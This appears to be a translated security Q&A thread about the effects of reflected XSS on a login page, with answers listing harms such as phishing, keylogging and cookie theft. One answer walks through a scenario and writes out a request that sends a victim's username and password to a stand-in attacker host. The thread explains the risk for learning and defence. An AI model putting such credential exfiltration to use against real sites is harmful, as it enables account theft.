¿Cuáles pueden ser los efectos del XSS reflejado en la página de inicio de sesión?

1

Soy un principiante en WASA. ¿Cuáles son los efectos adversos probables de tener una vulnerabilidad XSS reflejada en la página de inicio de sesión? Digamos que el XSS reflejado se identifica en el parámetro de nombre de usuario en la página de inicio de sesión.

    
pregunta Muthu Kumaran 22.09.2016 - 11:22
fuente

2 respuestas

2

Inyectar código en una página puede llevar a muchas cosas. Pocos de estos son:

  1. Conduce a ataques de phishing
  2. Redirección
  3. Se puede crear un keylogger
  4. XSRF
  5. Obtenga datos de las variables JS y de las cookies no HTTP solo
respondido por el Chiragh Dewan 29.09.2016 - 10:50
fuente
1
  1. Chuck envía a sus víctimas un enlace al sitio de destino ( example.com , que contiene una carga útil XSS en la cadena de consulta).
  2. Bob hace clic en el enlace.
  3. Bob comprueba la barra de direcciones para asegurarse de que sea https protocol, padlock y tenga el dominio esperado.
  4. Como la barra de direcciones muestra https://example.com , Bob inicia sesión.
  5. Al hacer clic en el botón Iniciar sesión , la carga útil de Chuck se ejecuta y envía el nombre de usuario y la contraseña de Bob al sitio web de Chuck mediante una solicitud AJAX:
    • POST https://chuck.example.org/get_creds
    • username=bob&password=baseball
respondido por el SilverlightFox 29.09.2016 - 15:57
fuente

Lea otras preguntas en las etiquetas